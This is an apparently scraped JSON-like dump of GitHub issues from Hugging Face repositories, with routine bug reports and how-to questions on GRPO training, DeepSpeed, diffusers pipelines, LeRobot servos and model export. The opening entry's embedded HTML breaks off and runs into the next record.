    "body": "@xenova Hi Josh.\n\nI am making several very capable TransformerJS single page applications and I really like what they are doing. My demo  index page is [here](https://hpssjellis.github.io/my-examples-of-transformersJS/public/index.html), but I can't seem to stop any of my examples if they are taking too long and then be able to do another request. I have tried several methods with the streamer, a stopFlag or an AbortController but nothing seems to be error free.\n\nAny suggestions I have included my single page application of deepseekR1 for reference.\n(Note: Single page applications are great for beginners and can be easily downloaded and ran locally after the model is cached)\n\n\n\n```\n\n\n\n\n\n  \n\n\n\n

DeepSeek-R1-webgpu in the browser

\n \nOpen the console. shift-ctrl-i

\n \nFully javascript activated. If you don't want to completely download \n \nonnx-community/DeepSeek-R1-Distill-Qwen-1.5B-ONNX then you should probably close this page.

\nIt will load from cache if downloaded once.

\n\nUses the Web-gpu model or other models: How do I retrieve real-time observations from the real robot with Lerobot?\n\n- Evaluating in simulation (Isaac Gym):\n\n> Can I directly evaluate my trained policy in Isaac Gym?\n ", "url": "https://github.com/huggingface/lerobot/issues/692", "state": "closed", "labels": [ "question", "simulation" ], "created_at": "2025-02-07T13:40:27Z", "updated_at": "2025-10-17T11:20:29Z", "user": "ShiyaoExtendQA" }, { "repo": "huggingface/diffusers", "number": 10743, "title": "Support zero-3 for FLUX training", "body": "### Describe the bug\n\nDue to memory limitations, I am attempting to use Zero-3 for Flux training on 8 GPUs with 32GB each. I encountered a bug similar to the one reported in this issue: https://github.com/huggingface/diffusers/issues/1865. I made modifications based on the solution proposed in this pull request: https://github.com/huggingface/diffusers/pull/3076. However, the same error persists. In my opinion, the fix does not work as expected, at least not entirely. Could you advise on how to modify it further?\n\nThe relevant code from https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_flux.py#L1157 has been updated as follows:\n```\n def deepspeed_zero_init_disabled_context_manager():\n \"\"\"\n returns either a context list that includes one that will disable zero.Init or an empty context list\n \"\"\"\n\n deepspeed_plugin = AcceleratorState().deepspeed_plugin if accelerate.state.is_initialized() else None\n print(f\"deepspeed_plugin: {deepspeed_plugin}\")\n if deepspeed_plugin is None:\n return []\n\n return [deepspeed_plugin.zero3_init_context_manager(enable=False)]\n\n with ContextManagers(deepspeed_zero_init_disabled_context_manager()):\n text_encoder_one, text_encoder_two = load_text_encoders(text_encoder_cls_one, text_encoder_cls_two)\n vae = AutoencoderKL.from_pretrained(\n args.pretrained_model_name_or_path,\n subfolder=\"vae\",\n revision=args.revision,\n variant=args.variant,\n )\n```\n\n### Reproduction\n\ndeepspeed config:\n```json\n{\n \"train_batch_size\": \"auto\",\n \"train_micro_batch_size_per_gpu\": \"auto\",\n \"gradient_accumulation_steps\":\"auto\",\n \"zero_optimization\": {\n \"stage\": 3,\n \"offload_optimizer\": {\"device\": \"cpu\"},\n \"stage3_gather_16bit_weights_on_model_save\": false,\n \"overlap_comm\": false\n },\n \"bf16\": {\n \"enabled\": true\n },\n \"fp16\": {\n \"enabled\": false\n }\n }\n \n```\n\naccelerate config:\n```\ncompute_environment: LOCAL_MACHINE\ndeepspeed_config:\n deepspeed_config_file: \"config/ds_config.json\"\ndistributed_type: DEEPSPEED\nmachine_rank: 0\nmain_training_function: main\nnum_machines: 1\nnum_processes: 8\n```\n\ntraining shell:\n```\n#!/bin/bash\n\nexport MODEL_NAME=\"black-forest-labs/FLUX.1-dev\"\nexport INSTANCE_DIR=\"dog\"\nexport OUTPUT_DIR=\"trained-flux\"\n\nexport DS_SKIP_CUDA_CHECK=1\n\nexport ACCELERATE_CONFIG_FILE=\"config/accelerate_config.yaml\"\n\nACCELERATE_CONFIG_FILE_PATH=${1:-$ACCELERATE_CONFIG_FILE} \n\nFLUXOUTPUT_DIR=flux_lora_output\n\nmkdir -p $FLUXOUTPUT_DIR\n\naccelerate launch --config_file $ACCELERATE_CONFIG_FILE_PATH train_dreambooth_lora_flux.py \\\n --pretrained_model_name_or_path=$MODEL_NAME \\\n --instance_data_dir=$INSTANCE_DIR \\\n --output_dir=$OUTPUT_DIR \\\n --mixed_precision=\"bf16\" \\\n --instance_prompt=\"a photo of sks dog\" \\\n --resolution=1024 \\\n --train_batch_size=4 \\\n --guidance_scale=1 \\\n --gradient_accumulation_steps=1 \\\n --learning_rate=1e-4 \\\n --report_to=\"tensorboard\" \\\n --lr_scheduler=\"constant\" \\\n --lr_warmup_steps=0 \\\n --max_train_steps=100 \\\n --gradient_checkpointing \\\n --seed=\"0\"\n\n```\n\n### Logs\n\n```shell\nRuntimeError: 'weight' must be 2-D\n```\n\n### System Info\n\npytorch: 2.1.0\ndeepspeed: 0.14.0\naccelerate: 1.3.0\ndiffusers: develop\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10743", "state": "closed", "labels": [ "bug" ], "created_at": "2025-02-07T12:50:44Z", "updated_at": "2025-10-27T09:33:59Z", "comments": 9, "user": "xiaoyewww" }, { "repo": "huggingface/alignment-handbook", "number": 210, "title": "Problem with multi-epoch training", "body": "Hi, I run the orpo code with 1 epoch and there was no issue. But when I tried to run the code with 5 epochs, I had the following error just at the start of the second epoch:\n\n```\nRuntimeError: Tensors of the same index must be on the same device and the same dtype except `step` tensors that can be CPU and float32 notwithstanding\n``` \n\nAny idea of what could be wrong and how to fix it? Thank you! ", "url": "https://github.com/huggingface/alignment-handbook/issues/210", "state": "open", "labels": [], "created_at": "2025-02-07T04:50:41Z", "updated_at": "2025-02-07T04:50:41Z", "comments": 0, "user": "sowmaster" }, { "repo": "huggingface/smolagents", "number": 521, "title": "authenticated sessions with smolagents (how to be logged in during browser use)", "body": "**Is your feature request related to a problem? Please describe.**\nI would like smolagents to be able to use websites with my login credentials.\n\n**Describe the solution you'd like**\nEither a way to give Helium credentials, or a way to use my actual browser, like: https://github.com/browser-use/browser-use/blob/main/examples/browser/real_browser.py\n\n**Is this not possible with the current options.**\nI'm fairly certain this is not possible with the current implementation. (If it is, can you make a demo code?)\n\n**Describe alternatives you've considered**\nI can use https://github.com/browser-use/browser-use/ instead\n\n**Additional context**\nhttps://github.com/browser-use/browser-use/ does a really good job of providing multiple options for this. ", "url": "https://github.com/huggingface/smolagents/issues/521", "state": "open", "labels": [ "enhancement" ], "created_at": "2025-02-06T15:51:53Z", "updated_at": "2025-02-06T15:51:53Z", "user": "rawwerks" }, { "repo": "huggingface/open-r1", "number": 210, "title": "How to push own dataset to hub with train and test dataset?", "body": "How do I push my own dataset to the hub along with the training and test datasets?\n\n```python\n train_distiset = pipeline.run(dataset=train_dataset)\n test_distiset = pipeline.run(dataset=test_dataset)\n```\nThere is a problem with the code above.", "url": "https://github.com/huggingface/open-r1/issues/210", "state": "closed", "labels": [], "created_at": "2025-02-06T15:28:15Z", "updated_at": "2025-02-08T05:59:13Z", "user": "JACKYLUO1991" }, { "repo": "huggingface/peft", "number": 2364, "title": "docs: broken links to boft", "body": "### System Info\n\non page: https://huggingface.co/docs/peft/v0.14.0/en/conceptual_guides/oft \n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\non page: https://huggingface.co/docs/peft/v0.14.0/en/conceptual_guides/oft \n\nSnippet:\n\nTake a look at the following step-by-step guides on how to finetune a model with BOFT:\n\n[Dreambooth finetuning with BOFT](https://huggingface.co/docs/peft/v0.14.0/en/task_guides/boft_dreambooth)\n[Controllable generation finetuning with BOFT (ControlNet)](https://huggingface.co/docs/peft/v0.14.0/en/task_guides/boft_controlnet)\n\n\n### Expected behavior\n\n\nperhaps the links should lead to\n\n https://github.com/huggingface/peft/blob/main/examples/boft_dreambooth/boft_dreambooth.md\n https://github.com/huggingface/peft/blob/main/examples/boft_controlnet/boft_controlnet.md", "url": "https://github.com/huggingface/peft/issues/2364", "state": "closed", "labels": [], "created_at": "2025-02-06T14:48:16Z", "updated_at": "2025-02-07T10:14:44Z", "comments": 1, "user": "makelinux" }, { "repo": "huggingface/open-r1", "number": 207, "title": "DeepSeek RL-Zero: How to clone DeepSeek RL-Zero?", "body": "How to clone DeepSeek RL-Zero?", "url": "https://github.com/huggingface/open-r1/issues/207", "state": "open", "labels": [], "created_at": "2025-02-06T13:45:33Z", "updated_at": "2025-02-06T13:45:33Z", "user": "win10ogod" }, { "repo": "huggingface/smolagents", "number": 501, "title": "How to run open_deep_research\uff1f", "body": "How to run open_deep_research\uff1f", "url": "https://github.com/huggingface/smolagents/issues/501", "state": "closed", "labels": [ "bug" ], "created_at": "2025-02-05T13:35:52Z", "updated_at": "2025-03-19T07:28:22Z", "user": "win4r" }, { "repo": "huggingface/trl", "number": 2768, "title": "How to log more metrics with wandb when using GRPO trainer and accelerate", "body": "### Reproduction\n\n```python\n\ndef correctness_reward_func(prompts, completions, answer, **kwargs) -> list[float]:\n responses = [completion[0][\"content\"] for completion in completions]\n q = prompts[0][-1][\"content\"]\n extracted_responses = [extract_xml_answer(r) for r in responses]\n\n # Get current step from trainer's state\n current_step = trainer.state.global_step if hasattr(trainer, \"state\") else 0\n\n # Initialize logger if not already done\n global example_logger\n if not hasattr(correctness_reward_func, \"example_logger\"):\n example_logger = LocalExampleLogger()\n correctness_reward_func.example_logger = example_logger\n\n # Log each example\n for i in range(len(responses)):\n example_dict = {\n \"step\": current_step,\n \"question\": q,\n \"true_answer\": answer[i],\n \"response\": responses[i],\n \"extracted_response\": extracted_responses[i],\n \"correct\": extracted_responses[i] == answer[i],\n \"generation_idx\": i, # Which generation attempt this was\n }\n example_logger.log_example(example_dict)\n\n # Calculate marker counts and correctness for all responses\n is_correct = [r == a for r, a in zip(extracted_responses, answer)]\n uncertainty_counts = [count_uncertainty_markers(r) for r in responses]\n internal_dialogue_counts = [count_internal_dialogue_markers(r) for r in responses]\n reflective_counts = [count_reflective_markers(r) for r in responses]\n\n # Separate counts for correct and incorrect responses\n correct_indices = [i for i, correct in enumerate(is_correct) if correct]\n incorrect_indices = [i for i, correct in enumerate(is_correct) if not correct]\n\n # Log metrics using trainer's accelerator\n if hasattr(trainer, \"accelerator\"):\n ### NONE OF THE BELOW ARE LOGGED ON WANDB\n metrics = {\n \"correctness/correct_count\": len(correct_indices),\n \"correctness/total_examples\": len(responses),\n \"correctness/accuracy\": len(correct_indices) / len(responses),\n # Total markers across all responses\n \"markers/total/uncertainty\": sum(uncertainty_counts),\n \"markers/total/internal_dialogue\": sum(internal_dialogue_counts),\n \"markers/total/reflective\": sum(reflective_counts),\n # Markers in correct responses\n \"markers/correct/uncertainty\": sum(\n uncertainty_counts[i] for i in correct_indices\n )\n if correct_indices\n else 0,\n \"markers/correct/internal_dialogue\": sum(\n internal_dialogue_counts[i] for i in correct_indices\n )\n if correct_indices\n else 0,\n \"markers/correct/reflective\": sum(\n reflective_counts[i] for i in correct_indices\n )\n if correct_indices\n else 0,\n # Markers in incorrect responses\n \"markers/incorrect/uncertainty\": sum(\n uncertainty_counts[i] for i in incorrect_indices\n )\n if incorrect_indices\n else 0,\n \"markers/incorrect/internal_dialogue\": sum(\n internal_dialogue_counts[i] for i in incorrect_indices\n )\n if incorrect_indices\n else 0,\n \"markers/incorrect/reflective\": sum(\n reflective_counts[i] for i in incorrect_indices\n )\n if incorrect_indices\n else 0,\n }\n trainer.accelerator.log(metrics, step=current_step)\n\n return [2.0 if r == a else 0.0 for r, a in zip(extracted_responses, answer)]\n\n.......\n\nmodel_name = config[\"model\"][\"name\"]\noutput_dir = config[\"training\"][\"output_dir\"]\nrun_name = config[\"training\"][\"run_name\"]\n\ntraining_args = GRPOConfig(\n output_dir=output_dir,\n run_name=run_name,\n learning_rate=config[\"training\"][\"learning_rate\"],\n adam_beta1=config[\"training\"][\"adam_beta1\"],\n adam_beta2=config[\"training\"][\"adam_beta2\"],\n weight_decay=config[\"training\"][\"weight_decay\"],\n warmup_ratio=config[\"training\"][\"warmup_ratio\"],\n lr_scheduler_type=config[\"training\"][\"lr_scheduler_type\"],\n logging_steps=config[\"training\"][\"logging_steps\"],\n bf16=config[\"training\"][\"bf16\"],\n per_device_train_batch_size=config[\"training\"][\"per_device_train_batch_size\"],\n gradient_accumulation_steps=config[\"training\"][\"gradient_accumulation_steps\"],\n num_generations=config[\"training\"][\"num_generations\"],\n max_prompt_length=config[\"training\"][\"max_prompt_length\"],\n max_completion_length=config[\"training\"][\"max_completion_length\"],\n num_train_epochs=config[\"training\"][\"num_train_epochs\"],\n save_steps=config[\"training\"][\"save_steps\"],\n max_grad_norm=config[\"training\"][\"max_grad_norm\"],\n report_to=[\"wandb\"]\n if (not torch.distributed.is_initialized() or torch.distributed.get_rank() == 0)\n else [],\n log_on_each_node=False, # Only log on main node\n use_vllm", "url": "https://github.com/huggingface/trl/issues/2768", "state": "open", "labels": [ "\u2728 enhancement", "\u26a1accelerate", "\ud83c\udfcb GRPO" ], "created_at": "2025-02-05T03:59:10Z", "updated_at": "2025-02-05T03:59:54Z", "user": "andrewsiah" }, { "repo": "huggingface/open-r1", "number": 183, "title": "How to directly input embeddings into the model?", "body": "My data are embeddings of the tokens (i.e., already after tokenization), is there a way of directly inputting the embeddings into the DeepSeek open-r1 model?\n\nFor example, when I use the BERT model via Hugging Face, I can simply input the embeddings using the \"inputs_embeds\" parameter:\n\n```\nfrom transformers import BertModel\nbert = BertModel.from_pretrained('bert-base-uncased')\noutputs = bert(inputs_embeds = ...)\n```\n\nIs there a similar way of doing so with the DeepSeek open-r1 model?\n\nThank you!", "url": "https://github.com/huggingface/open-r1/issues/183", "state": "open", "labels": [], "created_at": "2025-02-04T21:10:13Z", "updated_at": "2025-02-04T21:10:13Z", "user": "CCCC1800" }, { "repo": "huggingface/open-r1", "number": 180, "title": "How to launch GRPO with vLLM on multi-node slurm?", "body": "How to write sbatch script to run GRPO with vLLM on multiple nodes? What should be `--num_processes`? Is [GRPOTrainer](https://github.com/huggingface/trl/blob/1f344c9377d87cd348d92b78f27afea8e66563d7/trl/trainer/grpo_trainer.py#L288-L298) compatible with multinode training?", "url": "https://github.com/huggingface/open-r1/issues/180", "state": "open", "labels": [], "created_at": "2025-02-04T16:58:50Z", "updated_at": "2025-03-14T15:55:18Z", "user": "pbelevich" }, { "repo": "huggingface/lerobot", "number": 678, "title": "The inverse kinematic solution code of so-100", "body": "Are there any code of inverse kinematic of so-100, which just need the input of the x, y on my desk, then it can move to the target \ncoordinate\uff1f\nThanks for any response.", "url": "https://github.com/huggingface/lerobot/issues/678", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-02-04T03:58:17Z", "updated_at": "2025-10-15T16:55:01Z", "user": "gxy-1111" }, { "repo": "huggingface/diffusers", "number": 10710, "title": "Is DDUF format supported?", "body": "I checked this PR, https://github.com/huggingface/diffusers/pull/10037 and it is merged\n\n```\nfrom diffusers import DiffusionPipeline\nimport torch\n\npipe = DiffusionPipeline.from_pretrained(\n \"DDUF/FLUX.1-dev-DDUF\", dduf_file=\"FLUX.1-dev.dduf\", torch_dtype=torch.bfloat16\n)\n\nimage = pipe(\n \"photo a cat holding a sign that says Diffusers\", num_inference_steps=50, guidance_scale=3.5\n).images[0]\nimage.save(\"cat.png\")\n\n```\n\n```\n(venv) C:\\aiOWN\\diffuser_webui>python FLUX_DDUF.py\nFetching 1 files: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 1/1 [00:00\n pipe = DiffusionPipeline.from_pretrained(\n File \"C:\\aiOWN\\diffuser_webui\\venv\\lib\\site-packages\\huggingface_hub\\utils\\_validators.py\", line 114, in _inner_fn\n return fn(*args, **kwargs)\n File \"C:\\aiOWN\\diffuser_webui\\venv\\lib\\site-packages\\diffusers\\pipelines\\pipeline_utils.py\", line 951, in from_pretrained\n loaded_sub_model = load_sub_model(\n File \"C:\\aiOWN\\diffuser_webui\\venv\\lib\\site-packages\\diffusers\\pipelines\\pipeline_loading_utils.py\", line 742, in load_sub_model\n loaded_sub_model = load_method(name, **loading_kwargs)\n File \"C:\\aiOWN\\diffuser_webui\\venv\\lib\\site-packages\\huggingface_hub\\utils\\_validators.py\", line 114, in _inner_fn\n return fn(*args, **kwargs)\n File \"C:\\aiOWN\\diffuser_webui\\venv\\lib\\site-packages\\diffusers\\models\\modeling_utils.py\", line 931, in from_pretrained\n model_file = _merge_sharded_checkpoints(\n File \"C:\\aiOWN\\diffuser_webui\\venv\\lib\\site-packages\\diffusers\\models\\model_loading_utils.py\", line 365, in _merge_sharded_checkpoints\n raise FileNotFoundError(f\"Part file {file_name} not found.\")\nFileNotFoundError: Part file diffusion_pytorch_model-00003-of-00003.safetensors not found.\n```\n\n\n```\n- \ud83e\udd17 Diffusers version: 0.33.0.dev0\n- Platform: Windows-10-10.0.26100-SP0\n- Running on Google Colab?: No\n- Python version: 3.10.11\n- PyTorch version (GPU?): 2.5.1+cu124 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.27.1\n- Transformers version: 4.48.1\n- Accelerate version: 1.4.0.dev0\n- PEFT version: 0.14.1.dev0\n- Bitsandbytes version: 0.45.1\n- Safetensors version: 0.5.2\n- xFormers version: not installed\n- Accelerator: NVIDIA GeForce RTX 4060 Laptop GPU, 8188 MiB\n- Using GPU in script?: \n- Using distributed or parallel set-up in script?: \n- \n```", "url": "https://github.com/huggingface/diffusers/issues/10710", "state": "closed", "labels": [], "created_at": "2025-02-03T17:42:37Z", "updated_at": "2025-02-23T17:56:26Z", "comments": 4, "user": "nitinmukesh" }, { "repo": "huggingface/trl", "number": 2754, "title": "How to do multi-node training for GRPO with DeepSpeed + vLLM?", "body": "### Multi-Node Request \n\nI am interested in doing multi-node (4 x 8 GPUs) reinforcement fine-tuning of 8B (or 14B) models using GRPO. However, given that at least 1 GPU needs to be assigned to vLLM, I am not sure how to exactly run multi-node setup? Would it be possible for you to share a simple set of scripts (config files and main .py file) with which I can test locally?\n\n### Possible to give more GPUs to vLLM?\n\nAlso, in case of multi-node training, would it better to assign more GPUs to vLLM for faster (distributed) generation? Currently if I pass \u201ccuda:6,7\u201d, then it throws an error saying expected base 10 single digit number.\n", "url": "https://github.com/huggingface/trl/issues/2754", "state": "closed", "labels": [ "\ud83d\ude80 deepspeed", "\ud83c\udfcb GRPO" ], "created_at": "2025-02-03T16:03:23Z", "updated_at": "2025-03-22T12:51:19Z", "user": "nikhilchandak" }, { "repo": "huggingface/lerobot", "number": 673, "title": "configure_motor.py says it's increasing the max acceleration of feetech motors, but is decreasing it", "body": "I built my SO ARM 100s before reading the huggingface instructions, so I am trying to retroactively setup the servos properly. I looked into configure_motor.py to see what it was doing so I could configure it manually, and I notice that for Feetech motors it sets Maximum_Acceleration to 254 to \" speedup acceleration and deceleration of the motors\". I read that value from all of the servos in both arms and the setting I was shipped with is 306, which, I assume, means faster acceleration and deceleration than 254.", "url": "https://github.com/huggingface/lerobot/issues/673", "state": "closed", "labels": [ "question", "robots" ], "created_at": "2025-02-01T18:46:30Z", "updated_at": "2025-04-07T15:52:20Z", "user": "jbrownkramer" }, { "repo": "huggingface/lerobot", "number": 672, "title": "Limited Range of Motion in 'Elbow Flex' Motor on SO-100 Follower Arm", "body": "# Issue: Limited Range of Motion in 'Elbow Flex' Motor on SO-100 Follower Arm\n\n## Description\nIn my build of the SO-100 arm, the follower arm exhibits an issue where the motor labeled **'elbow flex'** is restricted to a movement range of approximately **90 degrees from the rest position**.\n\n## Steps Taken to Troubleshoot\nI have attempted the following troubleshooting steps:\n\n- **Checked the servo separately**: The servo itself functions correctly and can move the full 360-degree range without issues.\n- **Tested manual movement**: Manually tested the servo under normal teleoperation conditions with the weight of the arm.\n- **Re-calibrated multiple times**: Repeated calibration to see if the issue persists.\n- **Modified calibration JSON manually**: Editing the JSON file generated after calibration had no effect. The **homing_offset** field is the only one that causes any noticeable changes, but it only shifts the relative position of the follower to the leader, which is not a viable solution.\n- **Swapped servos**: Replaced the servo with a new one to rule out hardware failure, but the issue remains.\n\n## Expected Behavior\nThe **'elbow flex'** motor should be able to move the full intended range, similar to the leader arm, without being restricted to 90 degrees.\n\n## Actual Behavior\nThe motor is constrained to only about **90 degrees of movement** from its rest position, despite the servo itself being capable of full rotation.\n\n## Additional Notes\n- The issue seems to persist despite changes in hardware and re-calibration.\n- There may be an issue with how the calibration data is applied or interpreted.\n- Any insights into possible firmware, software, or mechanical constraints would be appreciated.\n\n---\nWould appreciate any help or guidance on resolving this issue!\n", "url": "https://github.com/huggingface/lerobot/issues/672", "state": "closed", "labels": [ "question", "robots", "stale" ], "created_at": "2025-02-01T15:01:59Z", "updated_at": "2025-10-20T02:31:48Z", "user": "ParzivalExtrimis" }, { "repo": "huggingface/sentence-transformers", "number": 3207, "title": "How to increase batch size by using multiple gpus?", "body": "Hello! My fine-tuned model need a large batch size to get the best performance. I have multiple gpus with 40G VRAM each. How can i use them together to enlarge the batch size? Currently i can only set the batch size be 3 per GPU and seems they won't share the datas. How can i make the total batch size become 24?", "url": "https://github.com/huggingface/sentence-transformers/issues/3207", "state": "open", "labels": [], "created_at": "2025-01-31T18:00:08Z", "updated_at": "2025-02-19T10:36:28Z", "user": "13918763630" }, { "repo": "huggingface/optimum", "number": 2174, "title": "Support for ONNX export of SeamlessM4TModel", "body": "### Feature request\n\nAdd SeamlessM4Tv2 Model support to onnx_export_from_model.\n\n\n### Motivation\n\nBeing able to deploy SeamlessM4Tv2 models to production using onnx.\n\n### Your contribution\n\nI got the speech-to-text model to ONNX, but I'm not able to generate the audio as expected, even though I'm trying to give the tgt_lang_token_ids as decoder_input_ids. I could help with by submitting a PR, but I might start creating the model_config/model_patcher first if it is needed.\n\n\nEDIT: I got the speech-to-text model, not the speech-to-speech model. I'd like to export the t2u_model and the vocoder to onnx, but it seems that is giving problems, any advice on how to do it?", "url": "https://github.com/huggingface/optimum/issues/2174", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-01-30T15:10:31Z", "updated_at": "2025-03-18T02:07:02Z", "comments": 3, "user": "AlArgente" }, { "repo": "huggingface/diffusers", "number": 10683, "title": "Would anyone consider a diffusers export_to_frames utility fuction?", "body": "**Is your feature request related to a problem? Please describe.**\nThe current `export_to_video` function in Hugging Face's Diffusers library exports a compressed video, but it's not straightforward for users to obtain raw, lossless PNG frames from a list of frames. This can be a problem for users who need to work with individual frames or want to export them in a specific format as part of a workflow.\n\n**Describe the solution you'd like.**\nI propose introducing a new function, `export_to_frames`, in `huggingface/diffusers/utils/export_utils.py`. This function would take a the frames (either NumPy arrays or PIL Image objects) and export each frame as a separate PNG file in a specified output directory. The function would also allow users to specify the frame rate and output directory.\n\n**Describe alternatives you've considered.**\nWhile users can currently solve this problem on their own by using other libraries or writing custom code, it would be beneficial to provide a simple and standard method for exporting raw, uncompressed PNG frames. This would save users time and effort, and make the Diffusers library more user-friendly.\n\n**Additional context.**\nI've included very rough example implementation of the proposed `export_to_frames` function below:\n\n`\ndef export_to_frames(\n video_frames: Union[List[np.ndarray], List[PIL.Image.Image]], output_dir: str = None, fps: int = 10\n) -> str:\n \"\"\"\n Export each frame in a list of frames to a directory.\n\n Args:\n video_frames (Union[List[np.ndarray], List[PIL.Image.Image]]): A list of frames.\n output_dir (str, optional): The directory where the frames will be saved. Defaults to None.\n fps (int, optional): The frame rate. Defaults to 10.\n\n Returns:\n str: The path to the output directory.\n \"\"\"\n\n try:\n imageio.plugins.ffmpeg.get_exe()\n except AttributeError:\n raise AttributeError(\n (\n \"Found an existing imageio backend in your environment. Attempting to export frames with imageio. \\n\"\n \"Unable to find a compatible ffmpeg installation in your environment to use with imageio. Please install via pip install imageio-ffmpeg\"\n )\n )\n print( \"video_frames\",len(video_frames) )\n\n if isinstance(video_frames[0], np.ndarray):\n print( \"numpy\")\n video_frames = [(frame * 255).astype(np.uint8) for frame in video_frames]\n\n elif isinstance(video_frames[0], PIL.Image.Image):\n print( \"PIL\")\n video_frames = [np.array(frame) for frame in video_frames]\n\n print( \"video_frames\",len(video_frames) )\n\n for i, frame in enumerate(video_frames):\n print( \"frame\", i )\n filename = f\"frame_{i:04d}.png\"\n if isinstance(frame, np.ndarray):\n print(\"wrote via np\")\n imageio.imwrite(os.path.join(output_dir, filename), frame)\n elif isinstance(frame, PIL.Image.Image):\n print(\"wrote via PIL\")\n frame.save(os.path.join(output_dir, filename))\n\n return output_dir`\n\nThis rough function was tested briefly but should be rewritten I'm just using it for illustrative purposes since it worked. Please let me know if this idea is worth considering further and if we could proceed with something like this in the standard utilities in future?", "url": "https://github.com/huggingface/diffusers/issues/10683", "state": "open", "labels": [ "stale" ], "created_at": "2025-01-29T17:30:21Z", "updated_at": "2025-03-26T15:04:10Z", "comments": 4, "user": "lovetillion" }, { "repo": "huggingface/transformers.js", "number": 1174, "title": "How to create a new onnx TTS model like mms-tts-eng", "body": "### Question\n\nFirst of all, congratulations on such a great library!\n\nI would like to ask for your guidance and assistance in creating a new onnx model similar to the following one: \n\nhttps://huggingface.co/Xenova/mms-tts-eng/tree/main \n\n\u2026but for the Malagasy language: \n\nhttps://huggingface.co/facebook/mms-tts-mlg \n\nCould you provide me with some advice on how to create that model?\n\nThank you so much.", "url": "https://github.com/huggingface/transformers.js/issues/1174", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-29T16:02:13Z", "updated_at": "2025-02-05T12:48:57Z", "user": "elloza" }, { "repo": "huggingface/open-r1", "number": 113, "title": "What is the GPU resource required to run Open-R1 (Deepseek-R1) locally?", "body": "I am trying to run it using Ollama with Open WebUI in a docker container, does it required a dedicated GPU with high VRAM or an integrated GPU? \n\nWhich model (8 billion, 9 billion, 12 billion) can be required with each GPU VRAM?", "url": "https://github.com/huggingface/open-r1/issues/113", "state": "open", "labels": [], "created_at": "2025-01-29T14:08:47Z", "updated_at": "2025-01-29T21:17:17Z", "user": "ruidazeng" }, { "repo": "huggingface/open-r1", "number": 100, "title": "What is the compute needed for GRPO for 7B R1-Distill model?", "body": "Anybody who has tried GRPO over any of the R1-Distill models: what is the minimum GPU compute requirement to run the training?\nLet's say for R1-Distill-Qwen-7B ?\n\nI am talking about this from the README:\n\n### GRPO\n```\naccelerate launch --config_file configs/zero3.yaml src/open_r1/grpo.py \\\n --output_dir DeepSeek-R1-Distill-Qwen-7B-GRPO \\\n --model_name_or_path deepseek-ai/DeepSeek-R1-Distill-Qwen-7B \\\n --dataset_name AI-MO/NuminaMath-TIR \\\n --max_prompt_length 256 \\\n --per_device_train_batch_size 1 \\\n --gradient_accumulation_steps 16 \\\n --logging_steps 10 \\\n --bf16\n```", "url": "https://github.com/huggingface/open-r1/issues/100", "state": "open", "labels": [], "created_at": "2025-01-29T03:01:03Z", "updated_at": "2025-02-10T09:17:47Z", "user": "iamansinha" }, { "repo": "huggingface/diffusers", "number": 10677, "title": "Support for training with Grayscale images?", "body": "I am trying to train an unconditional diffusion model on grayscale images using your [pipeline](https://huggingface.co/docs/diffusers/training/unconditional_training). When running training with the default parameters I discovered inferred images that contained colour (specifically green). Where it learnt such colours from I do not know but I would predict the issue lies within the initial processing of the image set:\n\n`images = [augmentations(image.convert(\"RGB\")) for image in examples[\"image\"]]`\n\nas such I created a fork of this [repo ](https://github.com/DavidGill159/diffusers/tree/main/examples/unconditional_image_generation)and changed this line to:\n\n`images = [augmentations(image.convert(\"L\")) for image in examples[\"image\"]]`\n\nI also updated the model configuration (UNet2DModel) to work with single-channel inputs and outputs by setting `in_channels=1` and `out_channels=1` when initialising the model.\n\nAm I on the right track? or does the resolution lie elsewhere? I also noticed the resolution of the inferred images is very poor; not on par with the training set. What parameters can I adjust to improve this?\n**Ultimately I am interested in a diffusion model that focuses more on the textural composition of images, rather than the colou**r. ", "url": "https://github.com/huggingface/diffusers/issues/10677", "state": "open", "labels": [ "stale" ], "created_at": "2025-01-28T22:25:19Z", "updated_at": "2025-02-28T15:02:57Z", "comments": 1, "user": "DavidGill159" }, { "repo": "huggingface/diffusers", "number": 10675, "title": "Difference in Flux scheduler configuration max_shift", "body": "### Describe the bug\n\nCould you please check if the value of 1.16 here...\nhttps://github.com/huggingface/diffusers/blob/658e24e86c4c52ee14244ab7a7113f5bf353186e/src/diffusers/pipelines/flux/pipeline_flux.py#L78\n\n...is intentional or maybe a typo?\n\n`max_shift` is 1.15 both in the model configuration...\nhttps://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/scheduler/scheduler_config.json\n...and in the original inference code by BFL:\nhttps://github.com/black-forest-labs/flux/blob/d06f82803f5727a91b0cf93fcbb09d920761fba1/src/flux/sampling.py#L214\n\n\n\n### Reproduction\n\n-\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n-\n\n### Who can help?\n\n@yiyixuxu @DN6", "url": "https://github.com/huggingface/diffusers/issues/10675", "state": "closed", "labels": [ "bug", "good first issue", "help wanted", "contributions-welcome" ], "created_at": "2025-01-28T20:35:58Z", "updated_at": "2025-02-18T06:54:58Z", "comments": 2, "user": "dxqb" }, { "repo": "huggingface/transformers.js", "number": 1171, "title": "Does the image generation model support using LoRA?", "body": "### Question\n\nI would like to implement an image generation feature to my website using a image generation model and a LoRA. Is LoRA supported in transformers.js?", "url": "https://github.com/huggingface/transformers.js/issues/1171", "state": "open", "labels": [ "question" ], "created_at": "2025-01-28T19:48:38Z", "updated_at": "2025-02-11T23:11:27Z", "user": "hunkim98" }, { "repo": "huggingface/diffusers", "number": 10672, "title": "Please support callback_on_step_end for following 